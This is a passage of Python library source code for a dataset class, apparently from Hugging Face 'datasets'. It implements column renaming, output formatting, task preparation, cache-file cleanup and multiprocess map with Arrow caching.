" f"Current columns in the dataset: {dataset._data.column_names}" ) for column_name in column_names: del dataset._info.features[column_name] dataset._data = dataset._data.drop(column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @deprecated(help_message="Use Dataset.rename_column instead.") @fingerprint_transform(inplace=True) def rename_column_(self, original_column_name: str, new_column_name: str): """In-place version of :meth:`Dataset.rename_column`. .. deprecated:: 1.4.0 Use :meth:`Dataset.rename_column` instead. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. """ if original_column_name not in self._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if new_column_name in self._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. " f"Current columns in the dataset: {self._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: self._format_columns = rename(self._format_columns) self._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) self._data = self._data.rename_columns(new_column_names) self._data = update_metadata_with_features(self._data, self.features) @transmit_tasks @fingerprint_transform(inplace=False) def rename_column(self, original_column_name: str, new_column_name: str, new_fingerprint) -> "Dataset": """ Rename a column in the dataset, and move the features associated to the original column under the new column name. Args: original_column_name (:obj:`str`): Name of the column to rename. new_column_name (:obj:`str`): New name for the column. new_fingerprint Returns: :class:`Dataset`: A copy of the dataset with a renamed column. """ dataset = copy.deepcopy(self) if original_column_name not in dataset._data.column_names: raise ValueError( f"Original column name {original_column_name} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) if new_column_name in dataset._data.column_names: raise ValueError( f"New column name {original_column_name} already in the dataset. " f"Please choose a column name which is not already in the dataset. 
" f"Current columns in the dataset: {dataset._data.column_names}" ) if not new_column_name: raise ValueError("New column name is empty.") def rename(columns): return [new_column_name if col == original_column_name else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { new_column_name if col == original_column_name else col: feature for col, feature in self._info.features.items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset @transmit_tasks @fingerprint_transform(inplace=False) def rename_columns(self, column_mapping: Dict[str, str], new_fingerprint) -> "Dataset": """ Rename several columns in the dataset, and move the features associated to the original columns under the new column names. Args: column_mapping (:obj:`Dict[str, str]`): A mapping of columns to rename to their new names Returns: :class:`Dataset`: A copy of the dataset with renamed columns """ dataset = copy.deepcopy(self) extra_columns = set(column_mapping.keys()) - set(dataset.column_names) if extra_columns: raise ValueError( f"Original column names {extra_columns} not in the dataset. " f"Current columns in the dataset: {dataset._data.column_names}" ) number_of_duplicates_in_new_columns = len(column_mapping.values()) - len(set(column_mapping.values())) if number_of_duplicates_in_new_columns != 0: raise ValueError( "New column names must all be different, but this column mapping " f"has {number_of_duplicates_in_new_columns} duplicates" ) empty_new_columns = [new_col for new_col in column_mapping.values() if not new_col] if empty_new_columns: raise ValueError(f"New column names {empty_new_columns} are empty.") def rename(columns): return [column_mapping[col] if col in column_mapping else col for col in columns] new_column_names = rename(self._data.column_names) if self._format_columns is not None: dataset._format_columns = rename(self._format_columns) dataset._info.features = Features( { column_mapping[col] if col in column_mapping else col: feature for col, feature in (self._info.features or {}).items() } ) dataset._data = dataset._data.rename_columns(new_column_names) dataset._data = update_metadata_with_features(dataset._data, dataset.features) dataset._fingerprint = new_fingerprint return dataset def __len__(self): """Number of rows in the dataset.""" return self.num_rows def __iter__(self): """Iterate through the examples. If a formatting is set with :meth:`Dataset.set_format` rows will be returned with the selected format. """ for index in range(self.num_rows): yield self._getitem( index, decoded=False, ) def __repr__(self): return f"Dataset({{\n features: {list(self.features.keys())},\n num_rows: {self.num_rows}\n}})" @property def format(self): return { "type": self._format_type, "format_kwargs": self._format_kwargs, "columns": self.column_names if self._format_columns is None else self._format_columns, "output_all_columns": self._output_all_columns, } @contextlib.contextmanager def formatted_as( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """To be used in a `with` statement. Set __getitem__ return format (type and columns). 
Args: type (Optional ``str``): output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow'] None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ old_format_type = self._format_type old_format_kwargs = self._format_kwargs old_format_columns = self._format_columns old_output_all_columns = self._output_all_columns try: self.set_format(type, columns, output_all_columns, **format_kwargs) yield finally: self.set_format(old_format_type, old_format_columns, old_output_all_columns, **old_format_kwargs) @fingerprint_transform(inplace=True) def set_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.set_transform`. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output. None means __getitem__ returns all columns (default). output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. It is possible to call ``map`` after calling ``set_format``. Since ``map`` may add new columns, then the list of formatted columns gets updated. In this case, if you apply ``map`` on a dataset to add a new column, then this column will be formatted: new formatted columns = (all columns - previously unformatted columns) """ format_kwargs.update(format_kwargs.pop("format_kwargs", {})) # allow to use self.set_format(self.format) # Check that the format_type and format_kwargs are valid and make it possible to have a Formatter type = get_format_type_from_alias(type) _ = get_formatter(type, features=self.features, **format_kwargs) # Check filter column if isinstance(columns, str): columns = [columns] if isinstance(columns, tuple): columns = list(columns) if columns is not None and any(col not in self._data.column_names for col in columns): raise ValueError( f"Columns {list(filter(lambda col: col not in self._data.column_names, columns))} not in the dataset. 
Current columns in the dataset: {self._data.column_names}" ) if columns is not None: columns = columns.copy() # Ensures modifications made to the list after this call don't cause bugs self._format_type = type self._format_kwargs = format_kwargs self._format_columns = columns self._output_all_columns = output_all_columns logger.debug( "Set __getitem__(key) output type to %s for %s columns " " (when key is int or slice) and %s output other (un-formatted) columns.", "python objects" if type is None else type, "no" if columns is None else str(columns), "do" if output_all_columns else "don't", ) def reset_format(self): """Reset __getitem__ return format to python objects and all columns. Same as ``self.set_format()`` """ self.set_format() def set_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format` Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ self.set_format("custom", columns=columns, output_all_columns=output_all_columns, transform=transform) def with_format( self, type: Optional[str] = None, columns: Optional[List] = None, output_all_columns: bool = False, **format_kwargs, ): """Set __getitem__ return format (type and columns). The data formatting is applied on-the-fly. The format ``type`` (for example "numpy") is used to format batches when using __getitem__. It's also possible to use custom transforms for formatting using :func:`datasets.Dataset.with_transform`. Contrary to :func:`datasets.Dataset.set_format`, ``with_format`` returns a new Dataset object. Args: type (Optional ``str``): Either output type selected in [None, 'numpy', 'torch', 'tensorflow', 'pandas', 'arrow']. None means __getitem__ returns python objects (default) columns (Optional ``List[str]``): columns to format in the output None means __getitem__ returns all columns (default) output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) format_kwargs: keywords arguments passed to the convert function like `np.array`, `torch.tensor` or `tensorflow.ragged.constant`. """ dataset = copy.deepcopy(self) dataset.set_format(type=type, columns=columns, output_all_columns=output_all_columns, **format_kwargs) return dataset def with_transform( self, transform: Optional[Callable], columns: Optional[List] = None, output_all_columns: bool = False, ): """Set __getitem__ return format using this transform. The transform is applied on-the-fly on batches when __getitem__ is called. As :func:`datasets.Dataset.set_format`, this can be reset using :func:`datasets.Dataset.reset_format`. 
Contrary to :func:`datasets.Dataset.set_transform`, ``with_transform`` returns a new Dataset object. Args: transform (Optional ``Callable``): user-defined formatting transform, replaces the format defined by :func:`datasets.Dataset.set_format` A formatting function is a callable that takes a batch (as a dict) as input and returns a batch. This function is applied right before returning the objects in __getitem__. columns (Optional ``List[str]``): columns to format in the output If specified, then the input batch of the transform only contains those columns. output_all_columns (``bool`` default to False): keep un-formatted columns as well in the output (as python objects) If set to True, then the other un-formatted columns are kept with the output of the transform. """ dataset = copy.deepcopy(self) dataset.set_transform(transform=transform, columns=columns, output_all_columns=output_all_columns) return dataset def prepare_for_task(self, task: Union[str, TaskTemplate], id: int = 0) -> "Dataset": """Prepare a dataset for the given task by casting the dataset's :class:`Features` to standardized column names and types as detailed in :py:mod:`datasets.tasks`. Casts :attr:`datasets.DatasetInfo.features` according to a task-specific schema. Intended for single-use only, so all task templates are removed from :attr:`datasets.DatasetInfo.task_templates` after casting. Args: task (:obj:`Union[str, TaskTemplate]`): The task to prepare the dataset for during training and evaluation. If :obj:`str`, supported tasks include: - :obj:`"text-classification"` - :obj:`"question-answering"` If :obj:`TaskTemplate`, must be one of the task templates in :py:mod:`datasets.tasks`. id (:obj:`int`, default `0`): The id required to unambiguously identify the task template when multiple task templates of the same type are supported. """ # TODO(lewtun): Add support for casting nested features like answers.text and answers.answer_start in SQuAD if isinstance(task, str): tasks = [template.task for template in (self.info.task_templates or [])] compatible_templates = [template for template in (self.info.task_templates or []) if template.task == task] if not compatible_templates: raise ValueError( f"Task {task} is not compatible with this dataset! Available tasks: {list(unique_values(tasks))}" ) if not 0 <= id < len(compatible_templates): templates_list_str = "\n".join( f"- `{idx}` for task {template}" for idx, template in enumerate(compatible_templates) ) raise ValueError( f"Id {id} for task {task} is not in a valid range. Supported ids:\n{templates_list_str}" ) template = compatible_templates[id] elif isinstance(task, TaskTemplate): template = task else: raise ValueError( f"Expected a `str` or `datasets.TaskTemplate` object but got task {task} with type {type(task)}." 
        )
        template = template.align_with_features(self.info.features)
        column_mapping = template.column_mapping
        columns_to_drop = [column for column in self.column_names if column not in column_mapping]
        dataset = self.remove_columns(columns_to_drop)
        dataset = dataset.rename_columns(column_mapping)
        # We found a template so now flush `DatasetInfo` to skip the template update in `DatasetInfo.__post_init__`
        dataset.info.task_templates = None
        dataset = dataset.cast(features=template.features)
        return dataset

    def _getitem(self, key: Union[int, slice, str], decoded: bool = True, **kwargs) -> Union[Dict, List]:
        """
        Can be used to index columns (by string names) or rows (by integer index, slices, or iter of indices or bools)
        """
        format_type = kwargs["format_type"] if "format_type" in kwargs else self._format_type
        format_columns = kwargs["format_columns"] if "format_columns" in kwargs else self._format_columns
        output_all_columns = (
            kwargs["output_all_columns"] if "output_all_columns" in kwargs else self._output_all_columns
        )
        format_kwargs = kwargs["format_kwargs"] if "format_kwargs" in kwargs else self._format_kwargs
        format_kwargs = format_kwargs if format_kwargs is not None else {}
        formatter = get_formatter(format_type, features=self.features, decoded=decoded, **format_kwargs)
        pa_subtable = query_table(self._data, key, indices=self._indices if self._indices is not None else None)
        formatted_output = format_table(
            pa_subtable, key, formatter=formatter, format_columns=format_columns, output_all_columns=output_all_columns
        )
        return formatted_output

    @overload
    def __getitem__(self, key: Union[int, slice, Iterable[int]]) -> Dict:  # noqa: F811
        ...

    @overload
    def __getitem__(self, key: str) -> List:  # noqa: F811
        ...

    def __getitem__(self, key):  # noqa: F811
        """Can be used to index columns (by string names) or rows (by integer index or iterable of indices or bools)."""
        return self._getitem(
            key,
        )

    def cleanup_cache_files(self) -> int:
        """Clean up all cache files in the dataset cache directory, except the currently used cache file if there is
        one.

        Be careful when running this command that no other process is currently using other cache files.

        Returns:
            :obj:`int`: Number of removed files.
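
        Example (a minimal sketch; the dataset name below is hypothetical)::

            from datasets import load_dataset

            ds = load_dataset("some_dataset", split="train")  # hypothetical dataset name
            ds = ds.map(lambda x: x)  # writes an extra cache-*.arrow file
            removed = ds.cleanup_cache_files()
            print(f"removed {removed} cache file(s)")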
""" current_cache_files = [os.path.abspath(cache_file["filename"]) for cache_file in self.cache_files] if not current_cache_files: return 0 cache_directory = os.path.dirname(current_cache_files[0]) logger.info(f"Listing files in {cache_directory}") files: List[str] = os.listdir(cache_directory) files_to_remove = [] for f_name in files: full_name = os.path.abspath(os.path.join(cache_directory, f_name)) if f_name.startswith("cache-") and f_name.endswith(".arrow"): if full_name in current_cache_files: logger.info(f"Keeping currently used cache file at {full_name}") continue files_to_remove.append(full_name) for file_path in files_to_remove: logger.info(f"Removing {file_path}") os.remove(file_path) return len(files_to_remove) def _get_cache_file_path(self, fingerprint): if is_caching_enabled() and self.cache_files: cache_file_name = "cache-" + fingerprint + ".arrow" cache_directory = os.path.dirname(self.cache_files[0]["filename"]) else: cache_file_name = "cache-" + generate_random_fingerprint() + ".arrow" cache_directory = get_temporary_cache_files_directory() cache_file_path = os.path.join(cache_directory, cache_file_name) return cache_file_path def map( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[Union[str, List[str]]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[Union[str, List[str]]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, num_proc: Optional[int] = None, suffix_template: str = "_{rank:05d}_of_{num_proc:05d}", new_fingerprint: Optional[str] = None, desc: Optional[str] = None, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). Args: function (:obj:`Callable`): Function with one of the following signatures: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) If no function is provided, default to identity function: ``lambda x: x``. with_indices (:obj:`bool`, default `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[Union[str, List[str]]]`, default `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, default `False`): Provide batch of examples to `function`. 
batch_size (`Optional[int]`, default `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function`. drop_last_batch (:obj:`bool`, default `False`): Whether a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[Union[str, List[str]]]`, default `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, default `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, default `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, default `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, default `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, default `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, default `None`): Keyword arguments to be passed to `function`. num_proc (`Optional[int]`, default `None`): Max number of processes when generating cache. Already cached shards are loaded sequentially suffix_template (:obj:`str`): If cache_file_name is specified, then this suffix will be added at the end of the base name of each: defaults to "_{rank:05d}_of_{num_proc:05d}". For example, if cache_file_name is "processed.arrow", then for rank=1 and num_proc=4, the resulting file would be "processed_00001_of_00004.arrow" for the default suffix. new_fingerprint (`Optional[str]`, default `None`): the new fingerprint of the dataset after transform. If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. """ if keep_in_memory and cache_file_name is not None: raise ValueError("Please use either `keep_in_memory` or `cache_file_name` but not both.") if num_proc is not None and num_proc <= 0: raise ValueError("num_proc must be an integer > 0.") # If the array is empty we do nothing if len(self) == 0: return self if function is None: function = lambda x: x # noqa: E731 def decorate(f): """ Decorate the mapped function, so that its first argument is wrapped with a LazyDict to be used internally but a standard dictionary is returned at the end of the mapping. 
""" @wraps(f) def decorated(item, *args, **kwargs): # Decorate first arg with LazyDict (either Example or Batch) decorated_item = ( Example(item, features=self.features) if not batched else Batch(item, features=self.features) ) # Use the LazyDict internally, while mapping the function result = f(decorated_item, *args, **kwargs) # Return a standard dict return result.data if isinstance(result, LazyDict) else result return decorated function = decorate(function) if not self._format_type and not input_columns else function if isinstance(input_columns, str): input_columns = [input_columns] if input_columns is not None: for input_column in input_columns: if input_column not in self._data.column_names: raise ValueError( f"Input column {input_column} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) if isinstance(remove_columns, str): remove_columns = [remove_columns] if remove_columns is not None and any(col not in self._data.column_names for col in remove_columns): raise ValueError( f"Column to remove {list(filter(lambda col: col not in self._data.column_names, remove_columns))} not in the dataset. Current columns in the dataset: {self._data.column_names}" ) load_from_cache_file = load_from_cache_file if load_from_cache_file is not None else is_caching_enabled() if fn_kwargs is None: fn_kwargs = {} if num_proc is not None and num_proc > len(self): num_proc = len(self) logger.warning( f"num_proc must be <= {len(self)}. Reducing num_proc to {num_proc} for dataset of size {len(self)}." ) disable_tqdm = bool(logging.get_verbosity() == logging.NOTSET) or not utils.is_progress_bar_enabled() if num_proc is None or num_proc == 1: return self._map_single( function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=cache_file_name, writer_batch_size=writer_batch_size, features=features, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, new_fingerprint=new_fingerprint, disable_tqdm=disable_tqdm, desc=desc, ) else: def format_cache_file_name(cache_file_name, rank): sep = cache_file_name.rindex(".") base_name, extension = cache_file_name[:sep], cache_file_name[sep:] cache_file_name = base_name + suffix_template.format(rank=rank, num_proc=num_proc) + extension logger.info(f"Process #{rank} will write at {cache_file_name}") return cache_file_name def format_new_fingerprint(new_fingerprint, rank): return new_fingerprint + suffix_template.format(rank=rank, num_proc=num_proc) prev_env = deepcopy(os.environ) # check if parallelism if off # from https://github.com/huggingface/tokenizers/blob/bb668bc439dc34389b71dbb8ce0c597f15707b53/tokenizers/src/utils/parallelism.rs#L22 if prev_env.get("TOKENIZERS_PARALLELISM", "false").lower() not in ( "", "off", "false", "f", "no", "n", "0", ): logger.warning("Setting TOKENIZERS_PARALLELISM=false for forked processes.") os.environ["TOKENIZERS_PARALLELISM"] = "false" initargs, initializer = None, None if not disable_tqdm: initargs, initializer = (RLock(),), tqdm.set_lock shards = [ self.shard(num_shards=num_proc, index=rank, contiguous=True, keep_in_memory=keep_in_memory) for rank in range(num_proc) ] kwds_per_shard = [ dict( self=shards[rank], function=function, with_indices=with_indices, with_rank=with_rank, input_columns=input_columns, batched=batched, batch_size=batch_size, drop_last_batch=drop_last_batch, 
remove_columns=remove_columns, keep_in_memory=keep_in_memory, load_from_cache_file=load_from_cache_file, cache_file_name=format_cache_file_name(cache_file_name, rank) if cache_file_name is not None else None, writer_batch_size=writer_batch_size, features=features.copy() if features is not None else None, disable_nullable=disable_nullable, fn_kwargs=fn_kwargs, rank=rank, offset=sum(len(s) for s in shards[:rank]), disable_tqdm=disable_tqdm, new_fingerprint=format_new_fingerprint(new_fingerprint, rank) if new_fingerprint is not None else None, desc=desc, ) for rank in range(num_proc) ] # We search for already cached shards def catch_non_existent_error(func, kwargs): try: return func(**kwargs) except NonExistentDatasetError: return None transformed_shards = [ catch_non_existent_error(self.__class__._map_single, dict(cache_only=True, **kwds)) for kwds in kwds_per_shard ] # We try to create a pool with as many workers as dataset not yet cached. nb_of_missing_shards = transformed_shards.count(None) if nb_of_missing_shards > 0: with Pool(nb_of_missing_shards, initargs=initargs, initializer=initializer) as pool: os.environ = prev_env logger.info(f"Spawning {num_proc} processes") results = { i: pool.apply_async(self.__class__._map_single, kwds=kwds) for i, (kwds, cached_shard) in enumerate(zip(kwds_per_shard, transformed_shards)) if cached_shard is None } assert ( len(results) == nb_of_missing_shards ), "The number of missing cached shards needs to correspond to the number of `_map_single` we're running" for index, async_result in results.items(): transformed_shards[index] = async_result.get() assert ( transformed_shards.count(None) == 0 ), "All shards have to be defined Datasets, none should still be missing." logger.info(f"Concatenating {num_proc} shards") result = concatenate_datasets(transformed_shards) if new_fingerprint is not None: result._fingerprint = new_fingerprint return result @transmit_tasks @transmit_format @fingerprint_transform( inplace=False, ignore_kwargs=["load_from_cache_file", "cache_file_name", "disable_tqdm", "desc", "cache_only"] ) def _map_single( self, function: Optional[Callable] = None, with_indices: bool = False, with_rank: bool = False, input_columns: Optional[List[str]] = None, batched: bool = False, batch_size: Optional[int] = 1000, drop_last_batch: bool = False, remove_columns: Optional[List[str]] = None, keep_in_memory: bool = False, load_from_cache_file: bool = None, cache_file_name: Optional[str] = None, writer_batch_size: Optional[int] = 1000, features: Optional[Features] = None, disable_nullable: bool = False, fn_kwargs: Optional[dict] = None, new_fingerprint: Optional[str] = None, rank: Optional[int] = None, offset: int = 0, disable_tqdm: bool = False, desc: Optional[str] = None, cache_only: bool = False, ) -> "Dataset": """Apply a function to all the elements in the table (individually or in batches) and update the table (if function does update examples). 
Args: function (:obj:`Callable`): with one of the following signature: - `function(example: Union[Dict, Any]) -> Union[Dict, Any]` if `batched=False` and `with_indices=False` and `with_rank=False` - `function(example: Union[Dict, Any], *extra_args) -> Union[Dict, Any]` if `batched=False` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) - `function(batch: Union[Dict[List], List[Any]]) -> Union[Dict, Any]` if `batched=True` and `with_indices=False` and `with_rank=False` - `function(batch: Union[Dict[List], List[Any]], *extra_args) -> Union[Dict, Any]` if `batched=True` and `with_indices=True` and/or `with_rank=True` (one extra arg for each) If no function is provided, default to identity function: lambda x: x with_indices (:obj:`bool`, defaults to `False`): Provide example indices to `function`. Note that in this case the signature of `function` should be `def function(example, idx[, rank]): ...`. with_rank (:obj:`bool`, default `False`): Provide process rank to `function`. Note that in this case the signature of `function` should be `def function(example[, idx], rank): ...`. input_columns (`Optional[List[str]]`, defaults to `None`): The columns to be passed into `function` as positional arguments. If `None`, a dict mapping to all formatted columns is passed as one argument. batched (:obj:`bool`, defaults to `False`): Provide batch of examples to `function` batch_size (`Optional[int]`, defaults to `1000`): Number of examples per batch provided to `function` if `batched=True` `batch_size <= 0` or `batch_size == None`: Provide the full dataset as a single batch to `function` drop_last_batch (:obj:`bool`, default: `False`): Whether a last batch smaller than the batch_size should be dropped instead of being processed by the function. remove_columns (`Optional[List[str]]`, defaults to `None`): Remove a selection of columns while doing the mapping. Columns will be removed before updating the examples with the output of `function`, i.e. if `function` is adding columns with names in `remove_columns`, these columns will be kept. keep_in_memory (:obj:`bool`, defaults to `False`): Keep the dataset in memory instead of writing it to a cache file. load_from_cache_file (:obj:`bool`, defaults to `True` if caching is enabled): If a cache file storing the current computation from `function` can be identified, use it instead of recomputing. cache_file_name (`Optional[str]`, defaults to `None`): Provide the name of a path for the cache file. It is used to store the results of the computation instead of the automatically generated cache file name. writer_batch_size (:obj:`int`, default `1000`): Number of rows per write operation for the cache file writer. This value is a good trade-off between memory usage during the processing, and processing speed. Higher value makes the processing do fewer lookups, lower value consume less temporary memory while running `.map()`. features (`Optional[datasets.Features]`, defaults to `None`): Use a specific Features to store the cache file instead of the automatically generated one. disable_nullable (:obj:`bool`, defaults to `False`): Disallow null values in the table. fn_kwargs (`Optional[Dict]`, defaults to `None`): Keyword arguments to be passed to `function` new_fingerprint (`Optional[str]`, defaults to `None`): the new fingerprint of the dataset after transform. 
If `None`, the new fingerprint is computed using a hash of the previous fingerprint, and the transform arguments rank: (`Optional[int]`, defaults to `None`): If specified, this is the process rank when doing multiprocessing offset: (:obj:`int`, defaults to 0): If specified, this is an offset applied to the indices passed to `function` if `with_indices=True`. disable_tqdm (:obj:`bool`, defaults to `False`): Whether to silence tqdm's output. desc (`Optional[str]`, defaults to `None`): Meaningful description to be displayed alongside with the progress bar while mapping examples. cache_only (`bool`, defaults to `False`): Flag in order to notifiy the method will either find a cached dataset or raise `NonExistentDatasetError` exception, """ # Reduce logging to keep things readable in multiprocessing with tqdm if rank is not None and logging.get_verbosity() < logging.WARNING: logging.set_verbosity_warning() # Print at least one thing to fix tqdm in notebooks in multiprocessing # see https://github.com/tqdm/tqdm/issues/485#issuecomment-473338308 if rank is not None and not disable_tqdm and "notebook" in tqdm.__name__: print(" ", end="", flush=True) if fn_kwargs is None: fn_kwargs = {} # If we do batch computation but no batch size is provided, default to the full dataset if batched and (batch_size is None or batch_size <= 0): batch_size = self.num_rows # Check if we've already cached this computation (indexed by a hash) if self.cache_files: if cache_file_name is None: # we create a unique hash from the function, # current dataset file and the mapping args cache_file_name = self._get_cache_file_path(new_fingerprint) if os.path.exists(cache_file_name) and load_from_cache_file: logger.warning(f"Loading cached processed dataset at {cache_file_name}") info = self.info.copy() info.features = features info.task_templates = None return Dataset.from_file(cache_file_name, info=info, split=self.split) # Raise an error if we were supposed to return a cached dataset and none was found if cache_only: raise NonExistentDatasetError # We set this variable to True after processing the first example/batch in # `apply_function_on_filtered_inputs` if the map function returns a dict. # If set to False, no new arrow table will be created update_data = None class NumExamplesMismatchError(Exception): pass def validate_function_output(processed_inputs, indices): """Validate output of the map function.""" if processed_inputs is not None and not isinstance(processed_inputs, (Mapping, pa.Table)): raise TypeError( f"Provided `function` which is applied to all elements of table returns a variable of type {type(processed_inputs)}. Make sure provided `function` returns a variable of type `dict` (or a pyarrow table) to update the dataset or `None` if you are only interested in side effects." ) elif isinstance(indices, list) and isinstance(processed_inputs, Mapping): allowed_batch_return_types = (list, np.ndarray) all_dict_values_are_lists = all( isinstance(value, allowed_batch_return_types) for value in processed_inputs.values() ) if all_dict_values_are_lists is False: raise TypeError( f"Provided `function` which is applied to all elements of table returns a `dict` of types {[type(x) for x in processed_inputs.values()]}. When using `batched=True`, make sure provided `function` returns a `dict` of types like `{allowed_batch_return_types}`." 
) def apply_function_on_filtered_inputs(inputs, indices, check_same_num_examples=False, offset=0): """Utility to apply the function on a selection of columns.""" nonlocal update_data fn_args = [inputs] if input_columns is None else [inputs[col] for col in input_columns] if offset == 0: effective_indices = indices else: effective_indices = [i + offset for i in indices] if isinstance(indices, list) else indices + offset additional_args = () if with_indices: additional_args += (effective_indices,) if with_rank: additional_args += (rank,) processed_inputs = function(*fn_args, *additional_args, **fn_kwargs) if update_data is None: # Check if the function returns updated examples update_data = isinstance(processed_inputs, (Mapping, pa.Table)) validate_function_output(processed_inputs, indices) if not update_data: return None # Nothing to update, let's move on if self._format_type is not None: inputs = self._getitem( key=(indices if isinstance(indices, int) else slice(indices[0], indices[-1] + 1)), format_type=None, format_columns=None, format_kwargs=None, decoded=False, ) if remove_columns is not None: for column in remove_columns: inputs.pop(column) if check_same_num_examples: input_num_examples = len(inputs[next(iter(inputs.keys()))]) processed_inputs_num_examples = len(processed_inputs[next(iter(processed_inputs.keys()))]) if input_num_examples != processed_inputs_num_examples: raise NumExamplesMismatchError() if isinstance(inputs, dict) and isinstance(processed_inputs, Mapping): inputs.update(processed_inputs) return inputs else: return processed_inputs def init_buffer_and_writer(): # Prepare output buffer and batched writer in memory or on file if we update the table writer_features = features if writer_features is None: writer_features = self.features update_features = True else: update_features = False if keep_in_memory or cache_file_name is None: buf_writer = pa.BufferOutputStream() tmp_file = None writer = ArrowWriter( features=writer_features, stream=buf_writer, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) else: buf_writer = None logger.info(f"Caching processed dataset at {cache_file_name}") tmp_file = tempfile.NamedTemporaryFile("wb", dir=os.path.dirname(cache_file_name), delete=False) writer = ArrowWriter( features=writer_features, path=tmp_file.name, writer_batch_size=writer_batch_size, update_features=update_features, fingerprint=new_fingerprint, disable_nullable=disable_nullable, ) return buf_writer, writer, tmp_file # If `update_data` is True after processing the first example/batch, initalize these resources with `init_buffer_and_writer` buf_writer, writer, tmp_file = None, None, None # Optionally initialize the writer as a context manager with contextlib.ExitStack() as stack: try: # Only load the columns we actually need if input_columns: 